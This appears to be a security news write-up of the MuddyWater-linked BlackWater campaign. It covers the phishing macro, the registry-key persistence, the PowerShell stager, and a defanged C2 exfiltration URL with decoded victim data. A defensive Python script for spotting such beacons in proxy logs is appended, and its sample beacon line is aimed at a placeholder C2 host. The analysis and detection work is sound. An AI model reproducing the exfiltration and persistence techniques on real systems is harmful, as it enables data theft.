Researchers discovered a “Blackwater” malware campaign, suspected to be associated with the well-known MuddyWater APT, that bypasses security controls and installs a backdoor on victims’ PCs using MuddyWater’s tactics, techniques, and procedures (TTPs).
MuddyWater has been involved in various cyber attacks in the recent past and has been spotted targeting organizations in Pakistan, Turkey, and Tajikistan, using multiple social engineering methods to trick victims into enabling macros and activating payloads.
The Blackwater campaign is believed to be a new addition to MuddyWater’s arsenal, since the activity indicates that the threat actors applied many tactics within it to improve their operational security and avoid endpoint detection.
The threat actors use an obfuscated VBA script to establish the persistence mechanism, and the VBA script triggers a PowerShell stager; this is also a way of masquerading as a red-teaming tool.
Blackwater also employed a FruityC2 agent script, an open-source framework on GitHub, by letting the PowerShell stager communicate with the C2 server to enumerate the host machine further.
This is one of the methods the threat actors employed to make host-based detection more difficult and to avoid signature-based detection by Yara rules.
BlackWater Infection Process
Researchers discovered a weaponized document being sent to victims via phishing emails; its timestamp indicates that the document was created on April 23.
Once victims open the malicious document, it requires the user to enable the macro titled “BlackWater.bas”.
The threat actors also employed an anti-reverse-engineering technique, protecting the macro with a password so that it is inaccessible if a user attempts to view it in Visual Basic.
According to Talos Research, “The macro contains a PowerShell script to persist in the “Run” registry key, “KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding”.
The script then called the file “\ProgramData\SysTextEnc.ini” every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight stager.”
In the Blackwater campaign, the threat actors made some small changes, such as altering variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to a file.
Finally, the PowerShell script enumerates the targeted victim’s machine by querying the following information:
- Operating system’s name (i.e., the name of the machine)
- Operating system’s architecture
- Operating system’s caption
- Computer system’s domain
- Computer system’s username
- Computer’s public IP address
Once it has enumerated all the information, it sends a POST request to the C2 URL with the data base64-encoded, whereas in previous versions this information was written to a text file.
Decoding the enumerated data yields the information stolen from the victim:
hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\admin*192.168.000.01
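As an added example (not from the original article or from Talos’s research), the following Python triage script applies the detail above to web-proxy logs: it base64-decodes query-string values and flags a request only when several of the enumerated fields (OS caption, architecture, workgroup, HOST\user, IPv4 address) co-occur in one decoded value. The log format, hostnames, beacon string and regexes are constructed assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Heuristic patterns (my own) for the enumerated fields: OS caption, architecture, workgroup, HOST\user, IPv4.
FIELD_PATTERNS = {
    "os_caption": re.compile(r"Microsoft Windows", re.I),
    "architecture": re.compile(r"\b(32|64)-bit\b"),
    "domain_or_workgroup": re.compile(r"\bWORKGROUP\b"),
    "user_path": re.compile(r"[A-Za-z0-9_-]+\\[A-Za-z0-9_.-]+"),
    "ipv4": re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"),
}
MIN_FIELDS = 3  # fields that must co-occur in one decoded value before it is flagged

def try_b64(value):
    """Decode a query-string value as base64; return None if it is not valid base64."""
    value = value.replace(" ", "+")           # '+' may arrive already URL-decoded
    padded = value + "=" * (-len(value) % 4)  # repair stripped padding
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", errors="replace")
    except binascii.Error:
        return None

def inspect_request(url):
    """Return one finding per query parameter that decodes to host-enumeration data."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query):
        decoded = try_b64(value)
        if decoded is None:
            continue
        fields = [f for f, rx in FIELD_PATTERNS.items() if rx.search(decoded)]
        if len(fields) >= MIN_FIELDS:
            findings.append({"param": name, "decoded": decoded, "fields": fields})
    return findings

def scan_logs(lines):
    """Return [(line_no, findings)] for log lines whose URL (the last field) is flagged."""
    results = [(i, inspect_request(line.split()[-1])) for i, line in enumerate(lines)]
    return [(i, f) for i, f in results if f]

# Constructed sample data (not from the campaign): a beacon string shaped like the decoded
# request above, wrapped in a fake proxy-log line, plus two benign requests.
SAMPLE_BEACON = ("FF-FF-FF-FF-FF-FF*1997*EP1*Microsoft Windows 7 Professional*32-bit"
                 "*USER-PC*WORKGROUP*USER-PC\\admin*192.168.0.1")
SAMPLE_LOGS = [
    "2019-04-24T10:00:01Z 10.0.0.7 GET http://c2.example.invalid/bcerrxy.php?riHi="
    + quote(base64.b64encode(SAMPLE_BEACON.encode()).decode(), safe=""),
    "2019-04-24T10:00:02Z 10.0.0.8 GET http://search.example.invalid/?q=aGVsbG8gd29ybGQ%3D",
    "2019-04-24T10:00:03Z 10.0.0.9 GET http://news.example.invalid/index.php?page=3&lang=en",
]
```

Tune `MIN_FIELDS` and the patterns to your environment; a single decoded field (such as an IPv4 address) is common in legitimate traffic, which is why the script requires several to co-occur.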
Indicators of compromise